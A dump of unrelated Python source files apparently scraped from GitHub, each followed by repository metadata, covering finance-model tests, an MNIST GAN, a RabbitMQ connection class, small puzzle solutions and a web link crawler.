LOGGER.info("Creating the Athena Query Object")
my_query = AthenaQuery(query, database_name, result_bucket)
LOGGER.info("Beginning query execution")
query_execution_id = my_query.execute()
LOGGER.info("Retrieving query results")
# This will automatically wait for the query to execute
query_results = my_query.get_result()
LOGGER.info("Constructing a new AthenaQuery object from the existing execution id")
aq = AthenaQuery.from_execution_id(query_execution_id)
LOGGER.info("Retrieving status information from the new object")
aq.get_status_information()
if __name__ == "__main__":
main()
| MauriceBrg/aws-blog.de-projects | sls-athena/test_athena_helper.py | test_athena_helper.py | py | 1,734 | python | en | code | 50 | github-code | 13 |
4321487831 | from financepy.utils.global_types import FinExerciseTypes
from financepy.utils.helpers import print_tree
from financepy.models.bdt_tree import BDTTree
from financepy.market.curves.discount_curve_zeros import DiscountCurveZeros
from financepy.utils.global_vars import gDaysInYear
from financepy.utils.day_count import DayCountTypes
from financepy.utils.frequency import FrequencyTypes
from financepy.models.black import Black
from financepy.products.rates.ibor_swaption import SwapTypes
from financepy.products.rates.ibor_swaption import IborSwaption
from financepy.products.bonds.bond import Bond
from financepy.market.curves.discount_curve_flat import DiscountCurveFlat
from financepy.market.curves.discount_curve import DiscountCurve
from financepy.utils.date import Date
import numpy as np
def test_BDTExampleTwo():
# Valuation of a European option on a coupon bearing bond
# This follows example in Fig 28.11 of John Hull's book (6th Edition)
# but does not have the exact same dt so there are some differences
settlement_date = Date(1, 12, 2019)
issue_date = Date(1, 12, 2015)
expiry_date = settlement_date.add_tenor("18m")
maturity_date = settlement_date.add_tenor("10Y")
coupon = 0.05
freq_type = FrequencyTypes.SEMI_ANNUAL
accrual_type = DayCountTypes.ACT_ACT_ICMA
bond = Bond(issue_date, maturity_date, coupon, freq_type, accrual_type)
coupon_times = []
coupon_flows = []
cpn = bond._coupon/bond._frequency
num_flows = len(bond._coupon_dates)
for i in range(1, num_flows):
pcd = bond._coupon_dates[i-1]
ncd = bond._coupon_dates[i]
if pcd < settlement_date and ncd > settlement_date:
flow_time = (pcd - settlement_date) / gDaysInYear
coupon_times.append(flow_time)
coupon_flows.append(cpn)
for flow_date in bond._coupon_dates:
if flow_date > settlement_date:
flow_time = (flow_date - settlement_date) / gDaysInYear
coupon_times.append(flow_time)
coupon_flows.append(cpn)
coupon_times = np.array(coupon_times)
coupon_flows = np.array(coupon_flows)
strike_price = 105.0
face = 100.0
tmat = (maturity_date - settlement_date) / gDaysInYear
texp = (expiry_date - settlement_date) / gDaysInYear
times = np.linspace(0, tmat, 11)
dates = settlement_date.add_years(times)
dfs = np.exp(-0.05*times)
curve = DiscountCurve(settlement_date, dates, dfs)
price = bond.clean_price_from_discount_curve(settlement_date, curve)
assert round(price, 4) == 99.5420
sigma = 0.20
# Test convergence
num_time_steps = 5
exercise_type = FinExerciseTypes.AMERICAN
model = BDTTree(sigma, num_time_steps)
model.build_tree(tmat, times, dfs)
v = model.bond_option(texp, strike_price,
face, coupon_times, coupon_flows, exercise_type)
assert round(v['call'], 4) == 0.5043
assert round(v['put'], 4) == 8.2242
def test_BDTExampleThree():
# Valuation of a swaption as in Leif Andersen's paper - see Table 1 on
# SSRN-id155208.pdf
settlement_date = Date(1, 1, 2020)
times = np.array([0.0, 1.0, 2.0, 3.0, 4.0, 5.0])
dates = settlement_date.add_years(times)
rate = 0.06
dfs = 1.0 / (1.0 + rate/2.0)**(2.0*times)
curve = DiscountCurve(settlement_date, dates, dfs)
coupon = 0.06
freq_type = FrequencyTypes.SEMI_ANNUAL
accrual_type = DayCountTypes.ACT_ACT_ICMA
strike_price = 100.0
face = 100.0
# Andersen paper
num_time_steps = 200
exercise_type = FinExerciseTypes.EUROPEAN
years_to_maturity = 4.0
expiryYears = 2.0
maturity_date = settlement_date.add_years(years_to_maturity)
issue_date = Date(maturity_date._d, maturity_date._m, 2000)
sigma = 0.2012
expiry_date = settlement_date.add_years(expiryYears)
tmat = (maturity_date - settlement_date) / gDaysInYear
texp = (expiry_date - settlement_date) / gDaysInYear
bond = Bond(issue_date, maturity_date,
coupon, freq_type, accrual_type)
coupon_times = []
coupon_flows = []
cpn = bond._coupon/bond._frequency
for flow_date in bond._coupon_dates:
if flow_date > expiry_date:
flow_time = (flow_date - settlement_date) / gDaysInYear
coupon_times.append(flow_time)
coupon_flows.append(cpn)
coupon_times = np.array(coupon_times)
coupon_flows = np.array(coupon_flows)
price = bond.clean_price_from_discount_curve(
settlement_date, curve)
model = BDTTree(sigma, num_time_steps)
model.build_tree(tmat, times, dfs)
v = model.bermudan_swaption(texp,
tmat,
strike_price,
face,
coupon_times,
coupon_flows,
exercise_type)
assert round(price, 5) == 100.01832
assert round(v['pay']*100, 2) == 0.00
assert round(v['rec']*100, 2) == 8883.21
exercise_type = FinExerciseTypes.BERMUDAN
years_to_maturity = 10.0
expiryYears = 5.0
maturity_date = settlement_date.add_years(years_to_maturity)
issue_date = Date(maturity_date._d, maturity_date._m, 2000)
sigma = 0.1522
expiry_date = settlement_date.add_years(expiryYears)
tmat = (maturity_date - settlement_date) / gDaysInYear
texp = (expiry_date - settlement_date) / gDaysInYear
bond = Bond(issue_date, maturity_date,
coupon, freq_type, accrual_type)
coupon_times = []
coupon_flows = []
cpn = bond._coupon/bond._frequency
for flow_date in bond._coupon_dates:
if flow_date > expiry_date:
flow_time = (flow_date - settlement_date) / gDaysInYear
coupon_times.append(flow_time)
coupon_flows.append(cpn)
coupon_times = np.array(coupon_times)
coupon_flows = np.array(coupon_flows)
price = bond.clean_price_from_discount_curve(
settlement_date, curve)
model = BDTTree(sigma, num_time_steps)
model.build_tree(tmat, times, dfs)
v = model.bermudan_swaption(texp,
tmat,
strike_price,
face,
coupon_times,
coupon_flows,
exercise_type)
assert round(price, 5) == 100.08625
assert round(v['pay']*100, 2) == 263.28
assert round(v['rec']*100, 2) == 7437.00
| domokane/FinancePy | tests/test_FinModelRatesBDT.py | test_FinModelRatesBDT.py | py | 6,568 | python | en | code | 1,701 | github-code | 13 |
42185177402 | def calc_percentage(lst):
sum = 0.0
per = 0.0
for x in lst:
sum += float(x) #sum=sum+x
per = sum/len(lst)
return per
def sort_list(lst):
n = len(lst)
for i in range(n-1,-1,-1):
for j in range(0,i):
if(lst[j][2]>lst[j+1][2]):
lst[j],lst[j+1] = lst[j+1],lst[j]
#Read The file
file = open("practice.csv","r")
result = open("result2.txt","a")
above60 = []
bet5060 = []
below50 = []
for line in file:
line = line.strip()
lst = line.split(",")
per = calc_percentage(lst[2:])
if(per>=60):
above60.append([lst[0],lst[1],per])
elif (per<60 and per>=50):
bet5060.append([lst[0],lst[1],per])
else:
below50.append([lst[0],lst[1],per])
sort_list(above60)
sort_list(bet5060)
sort_list(below50)
result.write("\nTotal {} students scored more than or equal to 60%\n".format(len(above60)))
result.write("The Students Are: \n")
for x in above60:
result.write(x[0] + " " + x[1] + " " + str(x[2]) + "\n")
result.write("\nTotal {} students scored more than or equal to 50% and less than 60%".format(len(bet5060)))
result.write("The Students Are: \n")
for x in bet5060:
result.write(x[0] + " " + x[1] + " " + str(x[2]) + "\n")
result.write("\nTotal {} students scored less than 50%".format(len(below50)))
result.write("The Students Are: \n")
for x in below50:
result.write(x[0] + " " + x[1] + " " + str(x[2]) + "\n")
result.close()
file.close() | pythonchamps/pythonpractice | PercentageSeperate.py | PercentageSeperate.py | py | 1,465 | python | en | code | 0 | github-code | 13 |
263706306 | import mnist_utils as utils
import tensorflow as tf
import matplotlib.pyplot as plt
def create_generator(latent_dim):
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.InputLayer(input_shape=(latent_dim,)))
model.add(tf.keras.layers.Dense(7 * 7 * 64, activation="relu"))
model.add(tf.keras.layers.Reshape((7, 7, 64)))
model.add(tf.keras.layers.UpSampling2D())
model.add(tf.keras.layers.Conv2D(64, kernel_size=3, padding="same", activation=tf.keras.activations.relu))
model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
model.add(tf.keras.layers.UpSampling2D())
model.add(tf.keras.layers.Conv2D(32, kernel_size=3, padding="same", activation=tf.keras.activations.relu))
model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
model.add(tf.keras.layers.Conv2D(1, kernel_size=3, padding="same", activation=tf.keras.activations.tanh))
model.summary()
return model
def create_discriminator():
model = tf.keras.models.Sequential()
model.add(tf.keras.layers.InputLayer(input_shape=(28, 28, 1)))
model.add(tf.keras.layers.Conv2D(32, kernel_size=3, strides=2, padding="same"))
model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
model.add(tf.keras.layers.Conv2D(64, kernel_size=3, strides=2, padding="same"))
model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
model.add(tf.keras.layers.Conv2D(128, kernel_size=3, strides=2, padding="same"))
model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
model.add(tf.keras.layers.Conv2D(256, kernel_size=3, strides=1, padding="same"))
model.add(tf.keras.layers.LeakyReLU(alpha=0.2))
model.add(tf.keras.layers.BatchNormalization(momentum=0.8))
model.add(tf.keras.layers.Flatten())
model.add(tf.keras.layers.Dense(1, activation='sigmoid'))
model.summary()
return model
class Gan(object):
def __init__(self, epochs, batch_size, latent_dim, check_point_root, save_interval, log_dir):
if not tf.io.gfile.exists(check_point_root):
tf.io.gfile.makedirs(check_point_root)
self.check_point_root = check_point_root
if not tf.io.gfile.exists(log_dir):
tf.io.gfile.makedirs(log_dir)
self.log_dir = log_dir
self.epochs = epochs
self.batch_size = batch_size
self.latent_dim = latent_dim
self.save_interval = save_interval
ds_train, ds_test = utils.create_dataset(self.batch_size)
self.ds_train = ds_train
self.ds_test = ds_test
self.generator = create_generator(self.latent_dim)
self.discriminator = create_discriminator()
self.loss_obj = tf.keras.losses.BinaryCrossentropy()
self.generator_optimizer_obj = tf.keras.optimizers.Adam()
self.discriminator_optimizer_obj = tf.keras.optimizers.Adam()
self.metrics_obj = tf.keras.metrics.BinaryAccuracy()
self.check_point = tf.train.Checkpoint(
step=tf.Variable(0, dtype=tf.int32),
generator=self.generator,
discriminator=self.discriminator
)
self.check_point_manager = tf.train.CheckpointManager(checkpoint=self.check_point,
directory=self.check_point_root, max_to_keep=3)
latest_checkpoint = self.check_point_manager.latest_checkpoint
if latest_checkpoint:
print("Initializing from check point : {}".format(latest_checkpoint))
self.check_point.restore(latest_checkpoint) # 从最近的检查点恢复数据
else:
print("Initializing from scratch...")
def generator_loss_fn(self, dis_fake):
return self.loss_obj(tf.ones_like(dis_fake), dis_fake)
def discriminator_loss_fn(self, dis_fake, dis_real):
loss_fake = self.loss_obj(tf.zeros_like(dis_fake), dis_fake)
loss_real = self.loss_obj(tf.ones_like(dis_real), dis_real)
return loss_fake + loss_real
def create_noise_img(self, batch):
return tf.random.normal(shape=(batch, self.latent_dim))
def show_gen_img(self):
noise = self.create_noise_img(self.batch_size)
fake_img = self.generator(noise)
plt.imshow(fake_img[0])
plt.show()
@tf.function
def train_step(self, ds):
with tf.GradientTape(persistent=True) as tape:
x_true = ds[0]
batch = x_true.shape[0] # 动态计算每次迭代的batch_size
noise = self.create_noise_img(batch)
fake_img = self.generator(noise)
dis_fake = self.discriminator(fake_img)
dis_real = self.discriminator(x_true)
loss_generator = self.generator_loss_fn(dis_fake)
loss_discriminator = self.discriminator_loss_fn(dis_fake, dis_real)
generator_grad = tape.gradient(loss_generator, self.generator.trainable_weights)
self.generator_optimizer_obj.apply_gradients(zip(generator_grad, self.generator.trainable_weights))
discriminator_grad = tape.gradient(loss_discriminator, self.discriminator.trainable_weights)
self.discriminator_optimizer_obj.apply_gradients(zip(discriminator_grad, self.discriminator.trainable_weights))
self.metrics_obj(tf.ones_like(dis_fake), dis_fake) # 评价生成的图片与1之间的差距
return loss_generator, loss_discriminator
def train(self):
file_writer = tf.summary.create_file_writer(logdir=self.log_dir)
with file_writer.as_default():
for epoch in range(self.epochs):
for ds in self.ds_train:
loss_generator, loss_discriminator = self.train_step(ds=ds)
acc = self.metrics_obj.result() * 100
step = self.check_point.step.numpy()
log_info = "epoch:{} ,step:{}, loss_g:{} , loss_d:{} , acc:{} % ".format(epoch, step,
loss_generator,
loss_discriminator, acc)
print(log_info)
tf.summary.scalar(name="loss_generator", data=loss_generator, step=step)
tf.summary.scalar(name="loss_discriminator", data=loss_discriminator, step=step)
tf.summary.scalar(name="acc", data=acc, step=step)
if step % self.save_interval == 0:
self.check_point_manager.save()
noise_img = self.create_noise_img(self.batch_size)
gen_img = self.generator(noise_img)
tf.summary.image(name="gen_img", data=gen_img, step=step, max_outputs=5)
self.check_point.step.assign_add(1)
self.show_gen_img()
if __name__ == '__main__':
_check_point_root = "check_points/mnist_gan"
_log_dir = "logs/gan"
gan = Gan(epochs=10,
latent_dim=100,
batch_size=64,
check_point_root=_check_point_root,
save_interval=50,
log_dir=_log_dir
)
print('Training ...')
gan.train()
| zoomself/mnist | mnist_gan.py | mnist_gan.py | py | 7,315 | python | en | code | 0 | github-code | 13 |
13612680660 | class Solution(object):
def containsNearbyDuplicate(self, nums, k):
if len(nums) == 0:
return False
e = 0
dup = {}
while e < len(nums) and e < k:
if nums[e] in dup:
return True
dup.add(nums[e])
e += 1
s = 0
while e < len(nums):
if nums[e] in dup:
return True
dup.add(nums[e])
dup.remove(nums[s])
s += 1
e += 1
return False
| clovery410/mycode | leetcode/219contains_duplicate2.py | 219contains_duplicate2.py | py | 525 | python | en | code | 1 | github-code | 13 |
33044274862 | import urllib.request,urllib.error,urllib.parse
from bs4 import BeautifulSoup
url="https://www.youtube.com/"
info=urllib.request.urlopen(url) # notice no encoding
data=info.read() # the data received is read in UTF-8 only, it's not decoded
x=BeautifulSoup(data,"html.parser") # extracts the page in html format
tags=x('a') # makes a list of anchor tags in the html document
for tag in tags:
print(tag.get("href",None)) # extracts the href attribute from each anchor tag
# as a result we get all the links available on a particular webpage
# web-crawler pretends to be a web-browser but it can extract information about the webpage unlike a browser, for example
# here it extracts all the links available on a webpage, search engines are web-crawlers for example google, and chrome,firefox
# are web-browsers
| ishan-21/Using-Python-to-Access-Web-Data | source_codes/web_crawler.py | web_crawler.py | py | 837 | python | en | code | 0 | github-code | 13 |
71990901137 | from django import forms
from user.models import User, FileUpload
class UserForm(forms.ModelForm):
dob = forms.DateField(widget=forms.DateInput(format='%d/%m/%Y'),
input_formats=('%d/%m/%Y',))
class Meta:
model = User
fields = ('name', 'fathers_name', 'dob', 'pan_image', 'pan_number')
widgets = {
'dob': forms.DateInput(attrs={'class': 'datepicker'}),
}
class FileUploadForm(forms.ModelForm):
class Meta:
model = FileUpload
fields = ('file',)
| KRT12/ocr_reader | user/forms.py | forms.py | py | 548 | python | en | code | 0 | github-code | 13 |
30290815166 | """
Connection
==========
Class that is used to manage connection and communication state.
"""
import collections
import logging
import os
import pika
from pika import spec
from rejected import errors, log, state, utils
LOGGER = logging.getLogger(__name__)
Published = collections.namedtuple(
'Published', ['delivery_tag', 'message_id',
'exchange', 'routing_key', 'future'])
"""Used to keep track of published messages for delivery confirmations"""
Callbacks = collections.namedtuple(
'callbacks', ['on_ready', 'on_open_error',
'on_closed', 'on_blocked', 'on_unblocked',
'on_confirmation', 'on_delivery'])
class Connection(state.State):
"""Contains the connection to RabbitMQ used by
:class:`~rejected.process.Process` and
:class:`~rejected.consumer.Consumer`. This is an internal object but, but
is accessed in the consumer for publishing.
"""
HB_INTERVAL = 300
STATE_CLOSED = 0x08
STATE_CONNECTED = 0x09
def __init__(self, name, config, consumer_name, should_consume,
publisher_confirmations, io_loop, callbacks):
super(Connection, self).__init__()
self.blocked = False
self.callbacks = callbacks
self.channel = None
self.config = config
self.correlation_id = None
self.delivery_tag = 0
self.should_consume = should_consume
self.consumer_tag = '{}-{}-{}'.format(name, consumer_name, os.getpid())
self.io_loop = io_loop
self.last_confirmation = 0
self.logger = log.CorrelationIDAdapter(LOGGER, {'parent': self})
self.name = name
self.published_messages = []
self.publisher_confirmations = publisher_confirmations
self.handle = None
self.connect()
# Set specific state values
self.STATES[0x08] = 'CLOSED'
self.STATES[0x09] = 'CONNECTED'
@property
def is_closed(self):
"""Returns ``True`` if the connection is closed.
:rtype: bool
"""
return self.is_stopped
@property
def is_connected(self):
"""Returns ``True`` if the connection is open
:rtype: bool
"""
return self.state in [self.STATE_ACTIVE, self.STATE_CONNECTED]
def add_confirmation_future(self, exchange, routing_key, properties,
future):
"""Invoked by :class:`~rejected.consumer.Consumer` when publisher
confirmations are enabled, containing a stack of futures to finish,
by delivery tag, when RabbitMQ confirms the delivery.
:param str exchange: The exchange the message was published to
:param str routing_key: The routing key that was used
:param properties: AMQP message properties of published message
:type properties: pika.spec.Basic.Properties
:param tornado.concurrent.Future future: The future to resolve
"""
self.delivery_tag += 1
self.published_messages.append(
Published(self.delivery_tag, properties.message_id, exchange,
routing_key, future))
def clear_confirmation_futures(self):
"""Invoked by :class:`~rejected.consumer.Consumer` when process has
finished and publisher confirmations are enabled.
"""
self.published_messages = []
def connect(self):
"""Create the low-level AMQP connection to RabbitMQ.
:rtype: pika.TornadoConnection
"""
self.set_state(self.STATE_CONNECTING)
self.handle = pika.TornadoConnection(
self._connection_parameters,
on_open_callback=self.on_open,
on_open_error_callback=self.on_open_error,
stop_ioloop_on_close=False,
custom_ioloop=self.io_loop)
def reset(self):
self.channel = None
self.handle = None
self.correlation_id = None
self.published_messages = []
self.delivery_tag = 0
self.last_confirmation = 0
self.set_state(self.STATE_CLOSED)
def shutdown(self):
"""Start the connection shutdown process, cancelling any active
consuming and closing the channel if the connection is not active.
"""
if self.is_shutting_down:
self.logger.debug('Already shutting down')
return
self.set_state(self.STATE_SHUTTING_DOWN)
self.logger.debug('Shutting down connection')
if not self.is_active:
return self.channel.close()
self.logger.debug('Sending a Basic.Cancel to RabbitMQ')
self.channel.basic_cancel(self.on_consumer_cancelled,
self.consumer_tag)
def on_open(self, _handle):
"""Invoked when the connection is opened
:type _handle: pika.adapters.tornado_connection.TornadoConnection
"""
self.logger.debug('Connection opened')
self.handle.add_on_connection_blocked_callback(self.on_blocked)
self.handle.add_on_connection_unblocked_callback(self.on_unblocked)
self.handle.add_on_close_callback(self.on_closed)
self.handle.channel(self.on_channel_open)
def on_open_error(self, *args, **kwargs):
self.logger.error('Connection failure %r %r', args, kwargs)
self.set_state(self.STATE_CLOSED)
self.callbacks.on_open_error(self.name)
def on_closed(self, _connection, reply_code, reply_text):
self.set_state(self.STATE_CLOSED)
self.logger.debug('Connection closed (%s) %s', reply_code, reply_text)
self.reset()
self.callbacks.on_closed(self.name)
def on_blocked(self, frame):
self.logger.warning('Connection blocked: %r', frame)
self.blocked = True
self.callbacks.on_blocked(self.name)
def on_unblocked(self, frame):
self.logger.warning('Connection unblocked: %r', frame)
self.blocked = False
self.callbacks.on_unblocked(self.name)
def on_channel_open(self, channel):
"""This method is invoked by pika when the channel has been opened. It
will change the state to CONNECTED, add the callbacks and setup the
channel to start consuming.
:param pika.channel.Channel channel: The channel object
"""
self.logger.debug('Channel opened')
self.set_state(self.STATE_CONNECTED)
self.channel = channel
self.channel.add_on_close_callback(self.on_channel_closed)
self.channel.add_on_cancel_callback(self.on_consumer_cancelled)
if self.publisher_confirmations:
self.delivery_tag = 0
self.channel.confirm_delivery(self.on_confirmation)
self.channel.add_on_return_callback(self.on_return)
self.callbacks.on_ready(self.name)
def on_channel_closed(self, _channel, reply_code, reply_text):
"""Invoked by pika when RabbitMQ unexpectedly closes the channel.
Channels are usually closed if you attempt to do something that
violates the protocol, such as re-declare an exchange or queue with
different parameters. In this case, we'll close the connection
to shutdown the object.
:param pika.channel.Channel _channel: The AMQP Channel
:param int reply_code: The AMQP reply code
:param str reply_text: The AMQP reply text
"""
self.logger.warning('Channel was closed: (%s) %s - %s',
reply_code, reply_text, self.state_description)
if not (400 <= reply_code <= 499):
self.set_state(self.STATE_CLOSED)
return
if self.is_shutting_down:
self.logger.debug('Closing connection')
self.handle.close()
return
self.set_state(self.STATE_CONNECTING)
self.handle.channel(self.on_channel_open)
pending = self.pending_confirmations()
if not pending:
raise errors.RabbitMQException(self.name, reply_code, reply_text)
pending[0][1].future.set_exception(
errors.RabbitMQException(self.name, reply_code, reply_text))
def consume(self, queue_name, no_ack, prefetch_count):
"""Consume messages from RabbitMQ, changing the state, QoS and issuing
the RPC to RabbitMQ to start delivering messages.
:param str queue_name: The name of the queue to consume from
:param False no_ack: Enable no-ack mode
:param int prefetch_count: The number of messages to prefetch
"""
if self.state == self.STATE_ACTIVE:
self.logger.debug('%s already consuming', self.name)
return
self.set_state(self.STATE_ACTIVE)
self.channel.basic_qos(self.on_qos_set, 0, prefetch_count, False)
self.channel.basic_consume(
consumer_callback=self.on_delivery, queue=queue_name,
no_ack=no_ack, consumer_tag=self.consumer_tag)
def on_qos_set(self, frame):
"""Invoked by pika when the QoS is set
:param pika.frame.Frame frame: The QoS Frame
"""
self.logger.debug('QoS was set: %r', frame)
def on_consumer_cancelled(self, _frame):
"""Invoked by pika when a ``Basic.Cancel`` or ``Basic.CancelOk``
is received.
:param _frame: The Basic.Cancel or Basic.CancelOk frame
:type _frame: pika.frame.Frame
"""
self.logger.debug('Consumer has been cancelled')
if self.is_shutting_down:
self.channel.close()
else:
self.set_state(self.STATE_CONNECTED)
def on_confirmation(self, frame):
"""Invoked by pika when RabbitMQ responds to a Basic.Publish RPC
command, passing in either a Basic.Ack or Basic.Nack frame with
the delivery tag of the message that was published. The delivery tag
is an integer counter indicating the message number that was sent
on the channel via Basic.Publish.
:param pika.frame.Method frame: Basic.Ack or Basic.Nack frame
"""
delivered = frame.method.NAME.split('.')[1].lower() == 'ack'
self.logger.debug('Received publisher confirmation (Delivered: %s)',
delivered)
if frame.method.multiple:
for index in range(self.last_confirmation + 1,
frame.method.delivery_tag):
self.confirm_delivery(index, delivered)
self.confirm_delivery(frame.method.delivery_tag, delivered)
self.last_confirmation = frame.method.delivery_tag
def confirm_delivery(self, delivery_tag, delivered):
"""Invoked by RabbitMQ when it is confirming delivery via a Basic.Ack
:param
:param int delivery_tag: The message # being confirmed
:param bool delivered: Was the message delivered
"""
for offset, msg in self.pending_confirmations():
if delivery_tag == msg.delivery_tag:
self.published_messages[offset].future.set_result(delivered)
return
for msg in self.published_messages:
if msg.delivery_tag == delivery_tag and msg.future.done():
return
self.logger.warning('Attempted to confirm publish without future: %r',
delivery_tag)
def on_delivery(self, channel, method, properties, body):
"""Invoked by pika when RabbitMQ delivers a message from a queue.
:param channel: The channel the message was delivered on
:type channel: pika.channel.Channel
:param method: The AMQP method frame
:type method: pika.frame.Frame
:param properties: The AMQP message properties
:type properties: pika.spec.Basic.Properties
:param bytes body: The message body
"""
self.callbacks.on_delivery(
self.name, channel, method, properties, body)
def on_return(self, channel, method, properties, body):
"""Invoked by RabbitMQ when it returns a message that was published.
:param channel: The channel the message was delivered on
:type channel: pika.channel.Channel
:param method: The AMQP method frame
:type method: pika.frame.Frame
:param properties: The AMQP message properties
:type properties: pika.spec.Basic.Properties
:param bytes body: The message body
"""
pending = self.pending_confirmations()
if not pending: # Exit early if there are no pending messages
self.logger.warning('RabbitMQ returned message %s and no pending '
'messages are unconfirmed',
utils.message_info(method.exchange,
method.routing_key,
properties))
return
self.logger.warning('RabbitMQ returned message %s: (%s) %s',
utils.message_info(method.exchange,
method.routing_key, properties),
method.reply_code, method.reply_text)
# Try and match the exact message or first message published that
# matches the exchange and routing key
for offset, msg in pending:
if (msg.message_id == properties.message_id or
(msg.exchange == method.exchange and
msg.routing_key == method.routing_key)):
self.published_messages[offset].future.set_result(False)
return
# Handle the case where we only can go on message ordering
self.published_messages[0].future.set_result(False)
def pending_confirmations(self):
"""Return all published messages that have yet to be acked, nacked, or
returned.
:return: [(int, Published)]
"""
return sorted([(idx, msg)
for idx, msg in enumerate(self.published_messages)
if not msg.future.done()],
key=lambda x: x[1].delivery_tag)
@property
def _connection_parameters(self):
"""Return connection parameters for a pika connection.
:rtype: pika.ConnectionParameters
"""
return pika.ConnectionParameters(
self.config.get('host', 'localhost'),
self.config.get('port', 5672),
self.config.get('vhost', '/'),
pika.PlainCredentials(
self.config.get('user', 'guest'),
self.config.get('password', self.config.get('pass', 'guest'))),
ssl=self.config.get('ssl', False),
frame_max=self.config.get('frame_max', spec.FRAME_MAX_SIZE),
socket_timeout=self.config.get('socket_timeout', 10),
heartbeat_interval=self.config.get(
'heartbeat_interval', self.HB_INTERVAL))
| code-fabriek/rejected | rejected/connection.py | connection.py | py | 14,925 | python | en | code | null | github-code | 13 |
5311986178 | import utils
import os
from PIL import Image
from matplotlib import pyplot as plt
import numpy as np
import crypto
def get_spikes_for_letter_for_noise(letter, noise_level):
spike_trains = []
noise_string = "_" + str(noise_level) + "_"
folder = '/Users/mihailplesa/Documents/Doctorat/Research/Dataset/' + letter + '/test/'
for filename in os.listdir(folder):
if '.png' in filename:
if noise_string in filename:
img = Image.open(os.path.join(folder, filename))
if img is not None:
spike_trains.append(utils.spike_train_from_image(img))
return spike_trains
def get_network_output_var_for_letter(network, std_output, spike_train, load):
t = network.run_network(spike_train, False, 0, load=load)
letter_output = network.get_output(t)
print(letter_output)
return np.linalg.norm(np.asarray(std_output) - np.asarray(letter_output))
def get_network_privacy_output_for_letter(network, privacy):
t = network.run_network(privacy=privacy)
letter_output = network.get_output(t)
return letter_output
def get_network_privacy_var_for_letter(std_output, encrypted_output, private_key):
decrypted_output = [crypto.private_decrypt(ciphertext, private_key) for ciphertext in encrypted_output]
return np.linalg.norm(np.asarray(std_output) - np.asarray(decrypted_output))
def get_accuracy_for_letter_for_noise(trained_networks, std_outputs, true_letter, noise_level, load):
spike_trains = get_spikes_for_letter_for_noise(true_letter, noise_level)
acc = 0
for spike_train in spike_trains:
min = get_network_output_var_for_letter(trained_networks['a'], std_outputs['a'], spike_train, load)
ans_letter = 'a'
for letter in range(98, 123):
print('Test ', str(chr(letter)))
var = get_network_output_var_for_letter(trained_networks[str(chr(letter))], std_outputs[str(chr(letter))], spike_train, load)
if var < min:
min = var
ans_letter = str(chr(letter))
if ans_letter == true_letter:
acc = acc + 1
return acc / len(spike_trains)
def get_accuracy_over_encrypted(trained_networks, std_outputs, true_letter, noise_level, public_key, private_key):
spike_trains = get_spikes_for_letter_for_noise(true_letter, noise_level)
acc = 0
zero_encryption = crypto.public_encryption(0, public_key)
for spike_train in spike_trains:
encrypted_spike_train = [crypto.public_encryption(int(spike), public_key) for spike in spike_train]
privacy = (encrypted_spike_train, zero_encryption)
encrypted_outputs = get_network_privacy_output_for_letter(trained_networks['a'], privacy)
min = get_network_privacy_var_for_letter(std_outputs['a'], encrypted_outputs, private_key)
ans_letter = 'a'
for letter in range(98, 123):
print('Test ', str(chr(letter)))
encrypted_outputs = get_network_privacy_output_for_letter(trained_networks[str(chr(letter))], privacy)
var = get_network_privacy_var_for_letter(std_outputs[str(chr(letter))], encrypted_outputs, private_key)
if var < min:
min = var
ans_letter = str(chr(letter))
if ans_letter == true_letter:
acc = acc + 1
return acc / len(spike_trains)
| miiip/Privacy-Presering-Spiking-Neural-P-System | test.py | test.py | py | 3,367 | python | en | code | 0 | github-code | 13 |
9087807450 | import sys
input = sys.stdin.readline
R, C, M = map(int, input().split())
arr = {}
m_r = int((R-1)*2)
m_c = int((C-1)*2)
result = 0
for _ in range(M):
r,c,s,d,z = map(int, input().split())
arr[(r-1,c-1)]=[s,d,z]
def next_arr(arr, p):
new_fish_index = {}
global m_r, m_c, R, result
for i in range(R):
if (i,p) in arr:
result+=arr[(i,p)][2]
del arr[(i,p)]
break
for key, value in arr.items():
if value[1]<3:
d = 2
idx = 0
if m_r>0:
if value[1] == 2:
idx = (key[0] + value[0]) % m_r
else:
idx = (m_r + value[0] - key[0]) % m_r
if idx>m_r-idx:
d = 1
idx = m_r - idx
new_idx = (idx,key[1])
value[1] = d
if new_idx in new_fish_index:
if value[2]>new_fish_index[new_idx][2]:
new_fish_index[new_idx] = value
else:
new_fish_index[new_idx] = value
else:
d = 3
idx = 0
if m_c>0:
if value[1] == 3:
idx = (key[1] + value[0]) % m_c
else:
idx = (m_c + value[0] - key[1]) % m_c
if idx>m_c-idx:
d = 4
idx = m_c - idx
new_idx = (key[0],idx)
value[1] = d
if new_idx in new_fish_index:
if value[2]>new_fish_index[new_idx][2]:
new_fish_index[new_idx] = value
else:
new_fish_index[new_idx] = value
#print_data(new_fish_index)
return new_fish_index
def print_data(fish_data):
global R,C
arr = [[0]*C for i in range(R)]
for key,value in fish_data.items():
arr[key[0]][key[1]] = value[2]
for _ in arr:
print(_)
print()
for i in range(C):
arr = next_arr(arr,i)
print(result) | MinsangKong/DailyProblem | 07-12/4-2.py | 4-2.py | py | 2,012 | python | en | code | 0 | github-code | 13 |
16641994577 | import sys
import threadpool
import mistletoe
from bs4 import BeautifulSoup
import httpx
import os
import re
def download_pics(url, file, img_name):
img_data = httpx.get(url).content
filename = os.path.basename(file).split('.')[0]
dirname = os.path.dirname(file)
targer_dir = os.path.join(dirname, f'{filename}.assets')
if not os.path.exists(targer_dir):
os.mkdir(targer_dir)
# img_name = f'{uuid.uuid4().hex}.png'
with open(os.path.join(targer_dir, img_name), 'w+') as f:
f.buffer.write(img_data)
def download_and_replace_image(filepath: str):
url_suffix = 'https://upload-images.jianshu.io/upload_images/'
print(f'正在处理文件:{filepath}')
print(filepath)
with open(filepath, 'r', encoding='utf-8') as f:
file_content = f.read()
html = mistletoe.markdown(file_content)
soup = BeautifulSoup(html, features='html.parser')
for img in soup.find_all('img'):
img_url: str = img.get('src')
if not img_url.startswith('http://') and not img_url.startswith('https://'):
print(f'不是有效的网络图片链接,跳过')
return
